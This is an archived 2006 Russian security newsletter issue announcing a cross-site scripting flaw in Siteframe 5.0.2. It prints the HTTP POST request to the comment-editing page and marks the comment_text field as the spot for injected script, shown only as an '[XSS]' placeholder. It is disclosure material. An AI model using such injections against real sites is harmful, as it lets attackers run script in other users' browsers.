Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Siteframe. (comp.paper.supuser) : Рассылка : Subscribe.Ru

Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Февраль 2006 →
	1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28

Автор

Forester

Статистика

1.394 подписчиков
-1 за неделю

← Все выпуски →

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Siteframe.

Компьютер для продвинутых пользователей

Содержание:

Siteframe

ПО: Siteframe
Версия: 5.0.2

О программе:
Siteframe - малая система поддержки сайта быстрого развертывания. С Siteframe группы пользователей могут выкладывать фотографии и истории, создавать блоги, отправлять почту и многое другое.
Описание:
Siteframe - содержит недостаток, что позволяет провести удаленную атаку. Уязвимость найдена в страничке комментариев пользователей. Пользователь может изменить параметр GET и вставить XSS код.
- http POST request

http://[target]/edit/Comment
POST /edit/Comment HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=Hi&_submitted=1
но мы можем модифицировать POST по этому пути:
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=&_submitted=1
Использование:
comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=[XSS]&_submitted=1

Siteframe

Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можной найти: 273214003

В избранное